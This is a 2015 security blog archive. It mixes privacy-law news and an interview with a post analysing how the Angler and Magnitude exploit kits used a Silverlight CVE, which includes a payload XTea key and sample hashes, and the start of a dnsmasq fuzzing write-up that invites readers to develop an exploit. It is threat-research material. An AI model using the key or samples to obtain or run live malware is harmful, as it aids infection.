Monthly Archives: July 2015

Sites you use online, may tarnish your reputation and relationships


Cybercitizens use sites on the Internet as resources that offer them services with scant thought as to how their data and activity information could be used by site owners and others who have access to it. The others are entities who are sold this information, cyber criminals who steal it, third parties who provide services to the site owners and also innocuous users who come across this data because the sites privacy protection or in some cases security is not adequate.

Cybercitizens should note that many sites provide services for free, supported by advertisement revenue. These sites collect and analyze profile and activity information which includes clicks, page visits, and transaction information to selectively display advertisements suited to the user’s demographic profile or searches. This helps advertisers obtain better returns on their advertisement dollar. Most of the larger and more popular sites make their users sign up to lengthy terms and conditions, which few read or understand, to enable them use personal data. Larger more established sites lay out well worded privacy statements on their websites which users can read. In all cases, information related to financial transactions are normally governed by strict regulations and compliances which regulates use and specifies standards for the security of card data.

But, there are many other firms with questionable credentials and whose ownership remain largely unknown. They may be popular sites too, but on the vast global highway, there is no way that one can truly ascertain where your data resides, who sees it and what use it is put too.  The case of the hack of the extramarital affair dating site Ashley Madison, clearly demonstrates the vulnerability of those users to reputational damage, blackmail and extortion. There are many sites, whose membership if disclosed could hurt the reputations of millions of people. Pornographic sites for instance.

The trail of personal data that one puts online remains. For example, curious users of the Ashley Madison site would have no way of proving to their spouse that they subscribed to the site out of curiosity and not for intended use. 

The effect of disclosure of personal data varies from tarnished reputation and financial losses to minor privacy intrusions. Cybercitizens should evaluate these risks and their potential consequences when they use certain sites.

EDPS Issues Opinion and Launches Regulation App for Mobile Devices

On July 27, 2015, Giovanni Buttarelli, the European Data Protection Supervisor (“EDPS”), published Opinion 3/2015 on the reform of Europe’s data protection laws, intended to “assist the participants in the trilogue in reaching the right consensus on time.” The Opinion sets out the EDPS’ vision for the regulation of data protection, re-stating the case for a framework that strengthens the rights of individuals and noting that “the time is now to safeguard individuals’ fundamental rights and freedoms in the data-driven society of the future.”

In addition, the Opinion contains a four-column version of the text of the proposed EU General Data Protection Regulation (“GDPR”), comparing on an article-by-article basis the proposals of the European Commission, the European Parliament, the Council of the European Union and the EDPS’ detailed recommendations. At the same time, the EDPS launched a free app for mobile devices, allowing users to easily compare the respective texts. These can be downloaded in any given combination to allow users to compare them side-by-side on smartphones and tablets.

In offering its recommendations on the GDPR, the EDPS’ views are drawn from across the three texts, but for the most part steering a course that lies between that of the European Parliament and the Council. In some respects, the EDPS favors practicality, but in other areas it adopts an approach that is focused on strengthening individual rights.

The trilogue began only recently, and an ambitious timetable has been set for the discussions. It remains to be seen whether the text of the GDPR will be agreed upon by the end of this calendar year, but the political pressure to reach agreement is growing. The EDPS has now added its voice to the debate, urging the EU to make the most of this historic opportunity for reform.

States Writing Biometric-Capture Laws May Look to Illinois

Recent class actions filed against Facebook and Shutterfly are the first cases to test an Illinois law that requires consent before biometric information may be captured for commercial purposes. Although the cases focus on biometric capture activities primarily in the social-media realm, these cases and the Illinois law at issue have ramifications for any business that employs biometric-capture technology, including those who use it for security or sale-and-marketing purposes. In a recent article published in Law360, Hunton & Williams partner, Torsten M. Kracht, and associate, Rachel E. Mossman, discuss how businesses already using these technologies need to keep abreast of new legislation that might affect the legality of their practices, and how businesses considering the implementation of these technologies should consult local rules and statutes before implementing biometric imaging.

Read the full article now.

Happy Birthday – Smoothwall Celebrates 15 Years



Fifteen years ago, Lawrence Manning, a co-founder of Smoothwall, sat in his front room putting the final touches on a prototype for a special kind of software. 

This week, we
 spent some time catching up with Lawrence as he reflects on the 15 year progression of Smoothwall from a Open Source Linux project to the UK's number one web filter. 

SW: Where did the name Smoothwall come from?


LM: We had a couple of ideas for names. Since we were trying to popularize this through the Linux user groups, one of our ideas was to call it LUGWall. I’m glad we didn’t choose that! “SoHo” was a popular buzzword at the time, so we also had SoHo-Connect. And one of the other rejected names was WebbedWall, which I kind of like. The idea was also to have a “family” of projects one day, so we wanted a name that could be adapted. SmoothMail (email solution), and SmoothLinux which was going to be a desktop distribution based on Smoothwall ideas. Needless to say, nothing came of those ideas. There were rumours that the “Wall” part was named in honour of Larry Wall, the original author of the Perl programming language: the main language used in the project. I’m still not certain how much truth there is in this, but it’s a nice touch if it is true. Anyway, we went through a bunch of names and liked Smoothwall the best.

SW: What prompted you to start the first Open Source Smoothwall?

LM: The need for something to do! Not working at the time, I had energy to spend. And also the, maybe arrogant, belief that I could do something “better. There were alternatives around, not many, but some. Every one that we looked at was difficult to use, difficult to set up. The combination of those things was a pretty good driver.

SW: Why did you chose Open Source instead of Proprietary?

LM: Open Source is “free marketing”. I’m far from a believer that Open Source is the only way to make good software, but it is a great way to get people interested in what you are doing. In the early days of the project, I wrote all the code. But the fact it was Open Source (though it wasn’t run like a typical Open Source project) meant that people felt encouraged to tinker with it, and that led to ideas, and eventually code being contributed. This would not have happened if we’d kept the code closed; the interest just wouldn’t have been there.

SW: Why Linux?

LM: Well, there weren’t really any alternatives. I guess compared to the BSDs the driver support was better, but more than that, it was familiar. And we liked it of course. It was, and remains, the best platform for this kind of product, evidenced by the fact that everyone uses it in everything.

SW: What does it feel like to have invented a product that is responsible for 150 jobs?

LM: Obviously I’m very proud with what we have accomplished. What is especially gratifying, beyond the fact that we’ve created a company with, I believe it is right to say, a good ethical record, but also that it’s main business is keeping people safe.

SW: Did you imagine when you stated that Smoothwall would be where it is today?

LM: Nope! I honestly believed this thing would go on for about six months, and then I’d be forced back to Windows development work, with Smoothwall just being another little project to add to the list of little I’d worked on over the years.

SW: What's your favorite Star Trek character, or episode and why?

LM: 7 of 9? Actually it is Scotty. Series wise, The Original Series still stands the test of time. Within that series, I have too many favourite episodes to list. The newer stuff is good too of course, but you can’t beat TOS. Oh, and “Into Darkness” sucks!

SW: How did you meet George and Daniel?

George: I first met him at a motorway service station, near Exeter I think, to discuss commercial angles around Smoothwall. I was quite apprehensive because prior to it he’d sent me a big list of technical questions about Smoothwall, many of which I had no idea how to answer!

Daniel: Well, George headhunted him. Prior to actually meeting him I’d downloaded his DansGuardian software, which is basically what we wanted Daniel for, and played around with it, and of course had loads of questions. We got on great from the beginning, though I do remember being appalled with his first crack at a Guardian user interface!

SW: What's your best Smoothwall memory?

LM: There are many, of course. From a development point of view, I don’t believe I have ever been as productive as I was in the 3 months after the company was founded. In those 3 months I wrote the first versions of our VPN add-on (which is roughly what is sold today), a simple web filter module, and other things. Working only from one sentence requirements, on your own, having to design UIs yourself, having to actually get the thing to do what it has to do and having to test it all, is both intimidating and extremely rewarding. 

I remember writing the first version of a early add-on module called SmoothHost in this way, in an afternoon. Over the years we probably made a million pounds in revenue from that afternoon’s work. That kind of pure creative, seat of the pants way of working, I have to admit, I miss immensely.


Outside of the working environment, we’ve had some great company weekends. My favorite is probably the trip to Coniston in the Lake District. I think it was 2007. The company was still “innocent” then. It was a superb weekend.


Federal Court: Seventh Circuit States Data Breach Class’ Allegations Against Neiman Marcus Satisfy Article III Standing

On July 20, 2015, the United States Court of Appeals for the Seventh Circuit reversed a previous decision that dismissed a putative data breach class action against Neiman Marcus for lack of Article III standing. Remijas et al. v. Neiman Marcus Group, LLC, No. 14-3122.

The litigation arose from a 2013 data breach in which approximately 350,000 customers’ cards were exposed. The named plaintiffs in the consolidated actions sought to represent all of the roughly 350,000 customers whose card numbers were compromised, including the more than 340,000 customers who did not discover any fraudulent use of their cards. The plaintiffs’ causes of action included: negligence, breach of implied contract, unjust enrichment, unfair and deceptive business practices, invasion of privacy and violations of multiple state data breach laws.

Alleged categories of injury. Plaintiffs claimed four categories of actual injury: (1) lost time and money resolving the fraudulent charges; (2) lost time and money protecting themselves against future identity theft; (3) overpayment for items because the store allegedly failed to invest in adequate cybersecurity; and (4) lost control over their personal information. They also asserted two imminent injuries: increased risk of future fraudulent charges and greater susceptibility to identity theft. The court ruled that the first two categories of actual injury and the two imminent injuries satisfied Article III standing.

Clapper distinguished for imminent injuries. The Seventh Circuit’s analysis of imminent injury distinguished the Supreme Court of the United States’ opinion in Clapper v. Amnesty Int’l USA, 133 S. Ct. 1138 (2013). In Clapper, the complainants were not able to show that the act underlying the alleged injuries had occurred, or that the alleged harm was “certainly impending.” Finding support in a footnote from Clapper, the Seventh Circuit stated that standing could be established when the “substantial risk” of future harm causes a party to take reasonable steps to mitigate those imminent damages. The court found that although 9,200 customers had been reimbursed for actual fraudulent charges, redress for future fraudulent charges or future identity theft remained uncertain. It also held that there was an “objectively reasonable likelihood” that identity theft would occur.

Two actual injuries found adequate for standing. The court’s analysis of the actual injuries also distinguished Clapper, where the complained-of act may not have even happened to some or all of the plaintiffs. In contrast, the actual injuries related to the Neiman Marcus breach were sustained for an event that unquestionably occurred. Therefore, the lost time and money for protection against future identity theft and fraudulent charges were sufficient for standing and more than de minimis.

Overpayment and lost-control bases for injury not analyzed. Because it found adequate injury to support standing with the first two categories of injury, the panel declined to address the remaining two theories arising from overpayment and lost-control. The court described these asserted injuries as “more problematic” and it is questionable whether these injuries would be sufficient, on their own, to establish standing.

Causation and redressability. The court stated that other large-scale data breaches that occurred around the same time had “no bearing” on the traceability of the breach to Neiman Marcus. Rather, the court viewed this as a defense that might be raised by Neiman Marcus later in the proceedings. Regarding redressability, it also held that reimbursement of actual fraudulent charges did not negate the injuries related to mitigation expenses or future injuries.

Rule 12(b)(6) arguments not addressed. The Seventh Circuit declined to analyze the dismissal under Federal Rule of Civil Procedure 12(b)(6) because the district court decided the case on the standing issues alone, and Neiman Marcus did not file a cross-appeal for additional relief.

While the case has been remanded to the district court for further proceedings, it is another indicator that data breach litigants are more likely to weather a standing attack in the Ninth and Seventh Circuits compared to other federal circuits.

Read the full opinion from the Seventh Circuit court.

Cyber Risks in a “Connected World” can take human lives and cause physical damage

I believe that the cyber risks are always grossly underestimated or trivialized. Over the last few years due to the rapid digitization of businesses, there has been a growing spate of cyber-attacks the world over. New start-ups offer a panacea of digitized solutions through cloud platforms. With limited budgets and a focus on perfecting their business model, companies need to navigate the tradeoff between the portions of their financial capital that goes into product security as against growing the business.

The next phase of digital evolution is themed “connected” – connected cars, connected homes, and connected humans (with intelligent body parts like wireless enabled pacemakers). As businesses race to bring new connected products or to make intelligent existing products using internet enabled sensors, wireless, cloud management and mobile apps, they still seem to not realize the criticality of fool proofing these systems against cyber threats.

The risks have now extended beyond purely financial and reputation losses to threats which affect human lives.  As the world digitizes, cyber threats that damage property, cause physical harm and even kill will materialize at a scale that is virtually impossible to contain.

An early indication is the recent recall of 1.4m vehicles by Fiat Chrysler Automobiles, the world's seventh largest automaker, to fix a vulnerability that allowed hackers to use the cellular network to electronically control vital functions.Functions, which when manipulated could shut the engine down while it was being driven down the highway, take control of the steering wheel and disable the brakes. Similar threats would materialize if hackers were able to find flaws in a wireless pacemakers or other such devices.

The core issue is twofold. Firstly as the connected world becomes individualized,  malicious hackers would find and exploit flaws in products used by individuals or organizations they target. Remotely engineered assassinations may just become a reality.

The second and more dangerous consequence, is of terrorist organizations utilizing vulnerabilities that affect products used by many, cars for example, to launch mass attacks which would instantly cause more damage and widespread chaos, than detonating explosives. Such remote attacks from the Internet will bypass all conventional border security measures.

In a digitized world, cybersecurity and safety become intrinsically linked and as new standards slowly evolve, an immediate concerted attempt must be made by companies to build secure products to protect naïve cyber citizens against all sort of risks.


For a cybercitizen, security should be under the hood, so as to speak. Cybercitizens are unable to determine the extent to which these products are safe to use. Besides building safe products, systems to securely and instantly plug vulnerabilities will need to be perfected.

Hunton Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Hunton & Williams is pleased to announce its participation with the Global Legal Group in the publication of the second edition of the book The International Comparative Legal Guide to: Data Protection 2015. Members of the Hunton & Williams Global Privacy and Cybersecurity team prepared several chapters in the guide, including the opening chapter on “Legislative Change: Assessing the European Commission’s Proposal for a Data Protection Regulation,” and chapters on Belgium, China, France, Germany, the United Kingdom and the United States.

The guide provides privacy officers and in-house counsel with a comprehensive overview and analysis of data protection laws and regulations around the world. It begins with the first chapter on the proposed European legislative reform and then covers existing laws and regulations in 32 jurisdictions.

Bridget Treacy, partner and head of the UK Privacy and Cybersecurity practice, served as the contributing editor of the guide and co-authored the United Kingdom chapter. Additional Hunton & Williams authors included: Anita Bapat (United Kingdom), David Dumont (Belgium), Claire François (France), Dr. Jörg Hladjk (Germany), Chris D. Hydak (United States), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium) and Aaron P. Simpson (United States).

Hunton & Williams’ Global Privacy and Cybersecurity practice group assists organizations in managing privacy and data security risks associated with the collection, use and disclosure of consumer and employee personal information. Hunton & Williams has been ranked as the top law firm globally for privacy and data security by Computerworld magazine in all of its surveys, and has been rated by Chambers and Partners as the top privacy and data security practice in its Chambers Global, Chambers Europe, Chambers UK and Chambers USA guides.

The privacy practice also maintains The Centre for Information Policy Leadership, a privacy think tank and consulting practice that leads public policy initiatives that promote responsible information governance necessary for the continued growth of the information economy.

Read the full news release.

Connecticut Passes New Data Protection Measures into Law

On July 1, 2015, Connecticut’s governor signed into law Public Act No. 15-142, An Act Improving Data Security and Agency Effectiveness (the “Act”), that (1) amends the state’s data breach notification law to require notice to affected individuals and the Connecticut Attorney General within 90 days of a security breach and expands the definition of personal information to include biometric data such as fingerprints, retina scans and voice prints; (2) affirmatively requires all businesses, including health insurers, who experience data breaches to offer one year of identity theft prevention services to affected individuals at no cost to them; and (3) requires health insurers and contractors who receive personal information from state agencies to implement and maintain minimum data security safeguards. With the passing of the Act, Connecticut becomes the first state to affirmatively require businesses to provide these security services to consumers.

A brief summary of the data security requirements for health insurers and state contractors is set forth below:

Health Insurers

The new legislation requires health insurers and related entities (including pharmacy and third party benefits administrators) to:

  • Create a comprehensive information security program to safeguard individuals’ personal information.
  • Encrypt personal information being transmitted or while stored on a portable device.
  • Implement security measures to protect personal information stored on Internet-accessible devices.
  • Implement access controls and authentication measures to ensure that access to personal information is limited only to those who need it in connection with their job function.
  • Ensure that employees and third parties comply with data security requirements.

These requirements are effective October 1, 2015, but health insurers have until October 1, 2017, to come into full compliance.

State Contractors

Additionally, the Act requires that contracts between a state agency and a contractor authorizing the contractor to receive personal information include terms and conditions requiring the contractor to implement data security measures to protect the relevant personal information. The minimum data security requirements for contractors are substantially similar to the requirements for health insurers listed above, but also include additional requirements that the contractor:

  • Obtain approval from the contracting state agency to store data on removable storage media.
  • Report any suspected or actual breaches of the personal information to the state as soon as practical after discovery.

The section pertaining to state contractors is effective July 1, 2015.

Read the complete terms of the Act.

CVE-2015-1671 (silverlight up to 5.1.30514.0) and Exploit Kits



Patched with ms15-044 CVE-2015-1671 is described as TrueType Font Parsing Vulnerability.
Silverlight up to 5.1.30514.0 are affected, but note : most browser will warn that the plugin is outdated

Out of date Plugin protection in Chrome 39.0.2171.71
Out of date ActiveX controls blocking in Internet Explorer 11
(introduced in August 2014)



and also consider that Microsoft announced the end of Silverlight at beginning of the month.

Angler EK :
2015-07-21

Around the 1st of July some new Silverlight focused code appeared in Angler EK landing.
It even seems coders made some debug or something wrong as you could see this kind of popup several hours long on Angler EK.
Deofuscated snipet of Silverlight call exposed to Victims in Angler EK
2015-07-02
I failed trying to get something else than a 0 size silverlight calls.
I heard about filled calls from Eset and EKWatcher.
The exploit sent was 3fff76bfe2084c454be64be7adff2b87  and appears to be a variation of CVE-2015-1671 (Silverlight 5 before 5.1.40416.00).  I spent hours trying to get a full exploit chain....No luck. Only 0size calls.

But, it seems it's back today (or i get more lucky ? ) :

--
Disclaimer : many indicators are whispering it's the same variation of CVE-2015-1671, but I am still waiting for a strong confirmation
--

Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in IE 11 on Windows 7
2015-07-21

Silverlight 5.1_10411.0 exploited by Angler EK via CVE-2015-1671 in Chrome 39 on Windows 7
2015-07-21

Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in Firefox 38 on Windows 7
2015-07-21

Two x86 - x64 dll are encoded in the payload stream with XTea Key : m0boo69biBjSmd3p


Silverlight dll in DotPeek after Do4dot

Sample in those pass : ac05e093930662a2a2f4605f7afc52f2
(Out of topic payload is bedep which then gather an adfraud module - you have the XTea key if you want to extract)

Files: Fiddler (password is malware)
[Edit : 2015-07-26, has been spread to all Angler Threads]

Thanks for help/tips :
Eset, Microsoft, Horgh_RCEDarien Huss, Will Metcalf, EKWatcher.

Magnitude :
2015-07-28  has been spotted by Will Metcalf in Magnitude
It's a rip of Angler's one

Silverlight 5.1.30514.0 exploited by Magnitude
2015-08-29
Files: Fiddler (password is malware)


Read more :
CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits - 2013-11-13


FERC Proposes to Accept Updated CIP Standards and Calls for New Cybersecurity Controls

On July 16, 2015, the Federal Energy Regulatory Commission (“FERC”) issued a new Notice of Proposed Rulemaking (“NOPR”) addressing the critical infrastructure protection (“CIP”) reliability standards. The NOPR proposes to accept with limited modifications seven updated CIP cybersecurity standards. The NOPR also proposes that new requirements be added to the CIP standards to protect supply chain vendors against evolving malware threats and addresses risks to utility communications networks.

The CIP standards govern the cyber and physical security of the bulk electric system. They are mandatory and enforceable. Utilities that violate them are potentially subject to substantial financial penalties. CIP standards are developed, administered, and enforced by the North American Electric Reliability Corporation (“NERC”) subject to FERC’s oversight.

The NOPR identifies malware campaigns targeting supply chain vendors as a serious security threat that is not addressed by existing CIP standards. It therefore proposes to direct NERC to develop CIP requirements relating to supply chain management for industrial control system hardware, software and services. It offers specific guidance as to the elements that FERC believes such standards should have, including that they be forward-looking, objective-driven, and consistent with guidance offered in the National Institute of Standards and Technology (NIST SP 800-161).

In addition, the NOPR builds on earlier FERC orders conditionally accepting “version 5” of the CIP standards. Version 5 made various incremental improvements to earlier iterations of the CIP standards. FERC directed NERC to further revise the version 5 requirements to make them clearer, more specific, and more readily enforceable. It also instructed NERC to develop: (1) enhanced security controls for “low impact” assets; (2) controls to address the risks posed by “transient” electronic devices (e.g., thumb drives and laptops); and (3) a clearer definition of the term “communications networks.”

In response, NERC proposed seven updated “version 6” CIP standards in February that incorporated FERC’s directives. The new NOPR proposes to largely accept version 6 but requires NERC to broaden the scope of communications network protections from a limited group of control centers to “communication network components and data communicated between all bulk electric system Control Centers.” FERC also specifically seeks comments on the sufficiency of existing CIP controls regarding remote access used in relation to bulk electric system communications.

FERC’s actions are consistent with its history of continuously urging NERC to improve, and to broaden the scope of, the CIP standards. But the NOPR is also only the third time that FERC has proposed to use its authority to require NERC to propose a new reliability standard, highlighting the close attention that FERC has devoted to cybersecurity threats generally and its concern about evolving malware vulnerabilities in particular.

Written comments on the NOPR will be due 60 days after its publication in the Federal Register. If the proposed version 6 CIP standards are accepted they would supersede the not yet implemented version 5 standards and become effective no earlier than April 2016.

FCC Issues Clarifications Regarding the Telephone Consumer Protection Act

On July 10, 2015, the Federal Communications Commission (“FCC”) released a Declaratory Ruling and Order that provides guidance with respect to several sections of the Telephone Consumer Protection Act (“TCPA”). The Declaratory Ruling and Order responds to 21 separate requests from industry, government and others seeking clarifications regarding the TCPA and related FCC rules.

The majority of the clarifications relate to the sending of automated calls and text messages to consumers. For example, a few organizations requested clarification regarding the scope of the term “autodialer,” as many restrictions in the TCPA are triggered only if the sender used an autodialer to initiate a telephone call or text message. The Declaratory Ruling and Order states that Congress “intended a broad definition of autodialer,” and that equipment can be considered an autodialer if it has the capacity to dial random or sequential numbers but lacks the present ability to do so. Other highlights of the Declaratory Ruling and Order are provided below.

  • The FCC reviews the totality of the attendant circumstances regarding a particular call or text to determine who “initiated” or “made” the call or text for the purposes of the TCPA. The totality of the circumstances should be examined to determine (1) “who took the steps necessary to physically place the call;” and (2) “whether another person or entity was so involved in placing the call as to be deemed to have initiated it.”
  • Recipients of calls may “revoke consent at any time” to receive autodialed or prerecorded calls or text messages using any reasonable means.
  • Merely having another person’s wireless number in a contact list on a phone, by itself, does not demonstrate consent to send that person autodialed or prerecorded calls or text messages.
  • The TCPA requires the consent of the “current subscriber” of the call or text message, not the consent of the intended recipient. Accordingly, if an organization obtained consent from a consumer to send him or her autodialed or prerecorded calls or texts, and the consumer’s number is later reassigned to another consumer, the organization does not have consent to make autodialed or prerecorded calls or texts to the second consumer even if the organization intended to make the call or text to the original consumer. The Declaratory Ruling and Order states, however, that an organization may not be liable under the TCPA for the first call to the second consumer if the organization does not have knowledge of the reassignment.
  • One-time text messages “sent in response to a consumer’s request for information” do not violate the TCPA if (1) the text message is requested by the consumer, (2) the consumer receives only one message, and (3) the message does not contain information not requested by the consumer.

Read the full Declaratory Ruling and Order.

Indonesia Publishes Proposed Data Protection Rule

On July 14, 2015, pursuant to an implementation requirement of Government Regulation 82 of 2012, the Indonesian government published the Draft Regulation of the Minister of Communication and Information (RPM) of the Protection of Personal Data in Electronic Systems (“Proposed Regulation”). The Proposed Regulation addresses the protection of personal data collected by a variety of government agencies, enumerates the rights of those whose personal data is collected and the obligations of users of Information Communication Technology. Agencies to which the Proposed Regulation would apply include: the Directorate General of Immigration, which manages passport data; the Financial Services Authority, which regulates financial sector data; the Bank Indonesia, which regulates banking data; the Indonesian Consumers Foundation, which regulates protection of consumer data; the National Archives; and the Ministry of Health, which regulates health data and archives. The government provided a 10-day comment period for the proposal.

The Indonesian government also recently issued proposed guidelines for the registration of software to be used in “public services.” The guidelines carry out a mandate from Government Regulation No. 82 of 2012. The guidelines, as proposed, would require such software to be registered with the Ministry of Communications and Information Technology and meet certain requirements for security and reliability. One potential weakness of the guidelines is their failure to define “public services.” The government will accept public comments on this proposal through July 31.

House of Representatives Passes Bill to Permit Broader Use and Disclosure of Protected Health Information for Research Purposes

On July 10, 2015, the United States House of Representatives passed the 21st Century Cures Act (the “Act”), which is intended to ease restrictions on the use and disclosure of protected health information (“PHI”) for research purposes.

Currently, the HIPAA Privacy Rule permits the use and disclosure of PHI for research purposes without requiring authorization from an individual but does require that any waiver of the authorization requirement be approved by an institutional review board or a privacy board.

The Act amends the Health Information Technology for Economic and Clinical Health (“HITECH”) Act to obligate the Secretary of the Department of Health and Human Services to revise or clarify the HIPAA Privacy Rule to:

  • Allow the use and disclosure of PHI by a covered entity for research purposes to be treated as that entity’s “health care operations.”
  • Enable research activities that are related to the quality, safety, or effectiveness of a product or activity that is regulated by the Food and Drug Administration (“FDA”) to be considered public health activities so that the activities can be disclosed to a person subject to the FDA’s jurisdiction for the purposes of collecting or reporting adverse events, tracking FDA-regulated products, enabling product recalls or repairs or conducting post-marketing surveillance.
  • Permit remote access to PHI so long as the covered entity and researcher maintain “appropriate security and privacy safeguards” and the PHI is “not copied or otherwise retained by the researcher.”
  • Specify that an authorization for the use or disclosure of PHI for future research purposes is deemed to sufficiently describe the purpose of the use or disclosure of PHI if the authorization (1) sufficiently describes the purposes such that it would be reasonable for the individual to expect that the PHI could be used or disclosed for such future research, and (2) states that the authorization will either expire on a particular date or at a particular event or will remain valid “unless and until it is revoked by the individual.”

The Act also requires the Office of the National Coordinator for Health Information Technology to publish guidance that clarifies the HIPAA Privacy and Security Rules with respect to information blocking, which includes any business or technical practices that “prevent or materially discourage the exchange of electronic health information” and “do not serve to protect patient safety, maintain the privacy and security of individuals’ health information or promote competition and consumer welfare.”

The Act, which garnered widespread bipartisan support, now moves to the Senate, which is expected to take up the legislation this fall.

Several groups, including the Pharmaceutical Research and Manufacturers of America and the Association of American Medical Colleges, support the 21st Century Cures Act.

Hunton Webinar on the Proposed EU General Data Protection Regulation: Preparing for Change

On July 9, 2015, Hunton & Williams LLP hosted a webinar on the Proposed EU General Data Protection Regulation: Preparing for Change (Part 1). Hunton & Williams partner and head of the Global Privacy and Cybersecurity practice Lisa Sotto moderated the session, which was led by speakers Bridget Treacy, managing partner of the firm’s London office; Wim Nauwelaerts, managing partner of the firm’s Brussels office; and Jörg Hladjk, counsel in the firm’s Brussels office. Together the speakers presented an overview of the proposed EU General Data Protection Regulation, discussed expected changes from the existing Directive, and offered guidance on how to prepare for the next steps. The webinar was the first segment of a two-part series. Part II will be held later this year as negotiations continue to develop.

View a recording of the webinar now.

Draft Cybersecurity Law Published for Comment in China

On July 6, 2015, the Standing Committee of the National People’s Congress of the People’s Republic of China published a draft of the country’s proposed Network Security Law (the “Draft Cybersecurity Law”). A public comment period on the Draft Cybersecurity Law is now open until August 5, 2015.

At this point, the Draft Cybersecurity Law has not yet been finalized. The draft contains, however, a number of provisions that are significant, insofar as they reveal underlying assumptions and priorities that govern the development and promotion of cybersecurity in China. If even a handful of these provisions make their way into the final version, the law could prove itself to be consequential.

One such provision actually manifests in a number of clauses that firmly and clearly establish the government’s leading role in the furtherance of cybersecurity. In the Draft Cybersecurity Law, certain, relevant private firms are referred to as “network operators” and “operators of key information infrastructure.” Regardless of their technological resources and practical experience, these operators are required by the Draft Cybersecurity Law to support and cooperate with the government’s leading role in the furtherance of cybersecurity, rather than exercising a leading role of their own.

Another striking provision is one that would allow government bodies at certain levels to adopt measures to restrict the transmission of information over the Internet in places where public safety “incidents” (referred to somewhat euphemistically as “社会安全事件”) have erupted. This may be done to preserve the national security and public social order. It may become difficult to contact someone via the Internet who is in a place where such an “incident” has recently occurred. Already in practice in affected areas where there has been a “public safety incident,” short messaging services are usually restricted, and ingoing and outgoing telephone calls are strictly supervised.

The Draft Cybersecurity Law also includes a provision that pushes China towards a policy of data localization. Pursuant to this provision, important data (such as the personal information of citizens) must be stored within the territory of the People’s Republic of China. Notably, the restriction appears to be limited and would apply only to operators of key information infrastructure, largely enterprises in heavily licensed and regulated industries such as providers of basic and value-added telecommunications services, energy, utilities and health care services. The provision also appears to allow for cross-border transfers even by operators of key information infrastructure when there is an operational requirement for the transfer, as long as a security assessment has been conducted. The precise requirements of the security assessment, however, are not spelled out in the Draft Cybersecurity Law.

There are many other significant provisions in this potentially impactful draft law, including some that reiterate rules for the handling of personal data by requiring network operators to observe strict confidentiality and to not disclose, falsify, destroy, sell or illegally provide personal information of citizens which they have collected. Another provision requires network operators who collect personal information to do so only in a lawful and proper manner, to collect only what is necessary, to clearly state the purposes, method and scope of the collection and to obtain the consent of the data subject. Many of these provisions overlap with some of the requirements on the handling of “electronic personal information” imposed by the December 2012 Resolutions.

We will report further on the content of the law, particularly after the final version has been published.

How I nearly almost saved the Internet, starring afl-fuzz and dnsmasq

If you know me, you know that I love DNS. I'm not exactly sure how that happened, but I suspect that Ed Skoudis is at least partly to blame.

Anyway, a project came up to evaluate dnsmasq, and being a DNS server - and a key piece of Internet infrastructure - I thought it would be fun! And it was! By fuzzing in a somewhat creative way, I found a really cool vulnerability that's almost certainly exploitable (though I haven't proven that for reasons that'll become apparent later).

Although I started writing an exploit, I didn't finish it. I think it's almost certainly exploitable, so if you have some free time and you want to learn about exploit development, it's worthwhile having a look! Here's a link to the actual distribution of a vulnerable version, and I'll discuss the work I've done so far at the end of this post.

You can also download my branch, which is similar to the vulnerable version (branched from it), the only difference is that it contains a bunch of fuzzing instrumentation and debug output around parsing names.

dnsmasq

For those of you who don't know, dnsmasq is a service that you can run that handles a number of different protocols designed to configure your network: DNS, DHCP, DHCP6, TFTP, and more. We'll focus on DNS - I fuzzed the other interfaces and didn't find anything, though when it comes to fuzzing, absence of evidence isn't the same as evidence of absence.

It's primarily developed by a single author, Simon Kelley. It's had a reasonably clean history in terms of vulnerabilities, which may be a good thing (it's coded well) or a bad thing (nobody's looking) :)

At any rate, the author's response was impressive. I made a little timeline:

  • May 12, 2015: Discovered
  • May 14, 2015: Reported to project
  • May 14, 20252015: Project responded with a patch candidate
  • May 15, 2015: Patch committed

The fix was actually pushed out faster than I reported it! (I didn't report for a couple days because I was trying to determine how exploitable / scary it actually is - it turns out that yes, it's exploitable, but no, it's not scary - we'll get to why at the end).

DNS - the important bits

The vulnerability is in the DNS name-parsing code, so it makes sense to spend a little time making sure you're familiar with DNS. If you're already familiar with how DNS packets and names are encoded, you can skip this section.

Note that I'm only going to cover the parts of DNS that matter to this particular vulnerability, which means I'm going to leave out a bunch of stuff. Check out the RFCs (rfc1035, among others) or Wikipedia for complete details. As a general rule, I encourage everybody to learn enough to manually make requests to DNS servers, because that's an important skill to have - plus, it's only like 16 bytes to remember. :)

DNS, at its core, is actually rather simple. A client wants to look up a hostname, so it sends a DNS packet containing a question to a DNS server (on UDP port 53, normally, but TCP can be used as well). Some magic happens, involving caches and recursion, then the server replies with a DNS message containing the original question, and zero or more answers.

DNS packet structure

The structure of a DNS packet is:

  • (int16) transaction id (trn_id)
  • (int16) flags (which include QR [query/response], opcode, RD [recursion desired], RA [recursion available], and probably other stuff that I'm forgetting)
  • (int16) question count (qdcount)
  • (int16) answer count (ancount)
  • (int16) authority count (nscount)
  • (int16) additional count (arcount)
  • (variable) questions
  • (variable) answers
  • (variable) authorities
  • (variable) additionals

The last four fields - questions, answers, authorities, and additionals - are collectively called "resource records". Resource records of different types have different properties, but we aren't going to worry about that. The general structure of a question record is:

  • (variable) name (the important part!)
  • (int16) type (A/AAAA/CNAME/etc.)
  • (int16) class (basically always 0x0001, for Internet addresses)

DNS names

Questions and answers typically contain a domain name. A domain name, as we typically see it, looks like:

this.is.a.name.skullseclabs.org

But in a resource records, there aren't actually any periods, instead, each field is preceded by its length, with a null terminator (or a zero-length field) at the end:

\x04this\x02is\x01a\x04name\x0cskullseclabs\x03org\x00

The maximum length of a field is 63 - 0x3f - bytes. If a field starts with 0x40, 0x80, 0xc0, and possibly others, it has a special meaning (we'll get to that shortly).

Questions and answers

When you send a question to a DNS server, the packet looks something like:

  • (header)
  • question count = 1
  • question 1: ANY record for skullsecurity.org?

and the response looks like:

  • (header)
  • question count = 1
  • answer count = 11
  • question 1: ANY record for "skullsecurity.org"?
  • answer 1: "skullsecurity.org" has a TXT record of "oh hai NSA"
  • answer 2: "skullsecurity.org" has a MX record for "ASPMX.L.GOOGLE.com".
  • answer 3: "skullsecurity.org" has a A record for "206.220.196.59"
  • ...

(yes, those are some of my real records :) )

